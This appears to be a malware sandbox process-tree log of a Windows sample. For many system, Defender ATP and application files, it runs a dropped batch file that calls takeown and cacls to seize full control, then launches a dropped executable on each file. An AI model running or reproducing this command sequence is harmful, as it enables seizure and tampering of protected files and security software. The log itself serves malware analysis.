  depth 3 | PID 4496 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "msoeres.dll.mui" -nobanner
    depth 4 | PID 4556 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "msoeres.dll.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4916 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4976 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  depth 3 | PID 2400 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
  depth 3 | PID 2492 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" | signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 276 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "BrowserCore.exe.mui" -nobanner
    depth 4 | PID 4804 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "BrowserCore.exe.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4100 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4672 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""
  depth 3 | PID 5088 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C
  depth 3 | PID 4968 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" | signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 4848 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "MsSense.exe.mui" -nobanner
    depth 4 | PID 2592 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "MsSense.exe.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4860 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4828 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  depth 3 | PID 4104 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
  depth 3 | PID 3940 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" | signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 4796 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    depth 4 | PID 4768 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "PhotoAcq.dll.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 244 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4676 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""
  depth 3 | PID 2596 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C
  depth 3 | PID 5080 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" | signatures: Modifies file permissions
  depth 3 | PID 4108 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SenseCncProxy.exe" -nobanner
    depth 4 | PID 4504 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "SenseCncProxy.exe" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 2404 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 416 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  depth 3 | PID 4880 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
  depth 3 | PID 4844 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" | signatures: Modifies file permissions
  depth 3 | PID 4928 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "ImagingDevices.exe" -nobanner
    depth 4 | PID 4536 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "ImagingDevices.exe" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 256 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4356 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""
  depth 3 | PID 5108 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C
  depth 3 | PID 4696 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" | signatures: Modifies file permissions
  depth 3 | PID 5096 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Identity-H" -nobanner
    depth 4 | PID 4220 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "Identity-H" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4912 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4348 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  depth 3 | PID 4608 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
  depth 3 | PID 2764 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
  depth 3 | PID 4712 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    depth 4 | PID 4960 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "ImagingDevices.exe.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4452 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4476 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  depth 3 | PID 5024 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
  depth 3 | PID 4528 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" | signatures: Modifies file permissions
  depth 3 | PID 4972 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    depth 4 | PID 4956 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "PhotoViewer.dll.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 2500 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4188 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""
  depth 3 | PID 4920 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C
  depth 3 | PID 5092 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" | signatures: Modifies file permissions
  depth 3 | PID 4616 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Identity-V" -nobanner
    depth 4 | PID 268 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "Identity-V" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4952 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4908 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  depth 3 | PID 5072 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
  depth 3 | PID 4808 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" | signatures: Modifies file permissions
  depth 3 | PID 4864 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    depth 4 | PID 4596 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "PhotoAcq.dll.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4332 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 5104 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  depth 3 | PID 4392 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
  depth 3 | PID 4492 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" | signatures: Modifies file permissions
  depth 3 | PID 4700 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    depth 4 | PID 4924 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "TileCache_100_0_Data.bin" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4420 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4232 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""
  depth 3 | PID 4344 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
  depth 3 | PID 4448 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" | signatures: Modifies file permissions
  depth 3 | PID 4980 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "WinMail.exe.mui" -nobanner
    depth 4 | PID 4240 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "WinMail.exe.mui" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4424 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 5116 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  depth 3 | PID 4904 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
  depth 3 | PID 4936 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe" | signatures: Modifies file permissions
  depth 3 | PID 3976 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "wabmig.exe" -nobanner
    depth 4 | PID 272 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "wabmig.exe" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4964 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4460 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""
  depth 3 | PID 4996 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
  depth 3 | PID 5020 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" | signatures: Modifies file permissions
  depth 3 | PID 5016 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "settings.dat" -nobanner
    depth 4 | PID 2524 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "settings.dat" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4784 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner | signatures: Executes dropped EXE

depth 2 | PID 4932 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  depth 3 | PID 4456 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
  depth 3 | PID 4408 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" | signatures: Modifies file permissions
  depth 3 | PID 4564 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "settings.dat" -nobanner
    depth 4 | PID 4812 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "settings.dat" -nobanner | signatures: Executes dropped EXE
  depth 3 | PID 4740 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4572 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  depth 3 | PID 4628 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
  depth 3 | PID 5132 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" | signatures: Modifies file permissions
  depth 3 | PID 5152 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "superbar.png" -nobanner
    depth 4 | PID 5168 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "superbar.png" -nobanner
  depth 3 | PID 5192 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5216 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""
  depth 3 | PID 5264 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C
  depth 3 | PID 5284 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" | signatures: Modifies file permissions
  depth 3 | PID 5304 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "edb.chk" -nobanner
    depth 4 | PID 5320 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "edb.chk" -nobanner
  depth 3 | PID 5344 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5368 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  depth 3 | PID 5416 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
  depth 3 | PID 5436 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" | signatures: Modifies file permissions
  depth 3 | PID 5456 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "device.png" -nobanner
    depth 4 | PID 5472 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "device.png" -nobanner
  depth 3 | PID 5496 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5520 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""
  depth 3 | PID 5568 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C
  depth 3 | PID 5592 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" | signatures: Modifies file permissions
  depth 3 | PID 5612 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "utc.cert.json" -nobanner
    depth 4 | PID 5628 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "utc.cert.json" -nobanner
  depth 3 | PID 5656 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5680 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  depth 3 | PID 5728 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
  depth 3 | PID 5748 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" | signatures: Modifies file permissions
  depth 3 | PID 5768 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    depth 4 | PID 5784 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
  depth 3 | PID 5808 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5832 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  depth 3 | PID 5880 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
  depth 3 | PID 5900 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" | signatures: Modifies file permissions
  depth 3 | PID 5920 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "overlay.png" -nobanner
    depth 4 | PID 5936 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "overlay.png" -nobanner
  depth 3 | PID 5960 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5984 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""
  depth 3 | PID 6032 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C
  depth 3 | PID 6052 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"
  depth 3 | PID 6072 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "utc.tracing.json" -nobanner
    depth 4 | PID 6088 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "utc.tracing.json" -nobanner
  depth 3 | PID 6112 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 6136 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""
  depth 3 | PID 5180 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C
  depth 3 | PID 5156 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" | signatures: Modifies file permissions
  depth 3 | PID 5196 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "qmgr.jfm" -nobanner
    depth 4 | PID 4896 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "qmgr.jfm" -nobanner
  depth 3 | PID 5224 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5292 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  depth 3 | PID 5352 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
  depth 3 | PID 5260 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" | signatures: Modifies file permissions
  depth 3 | PID 5240 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Workflow.Targets" -nobanner
    depth 4 | PID 5376 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "Workflow.Targets" -nobanner
  depth 3 | PID 5432 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5448 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  depth 3 | PID 5512 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
  depth 3 | PID 5400 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" | signatures: Modifies file permissions
  depth 3 | PID 5380 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "ImagingDevices.exe" -nobanner
    depth 4 | PID 5588 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "ImagingDevices.exe" -nobanner
  depth 3 | PID 5596 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

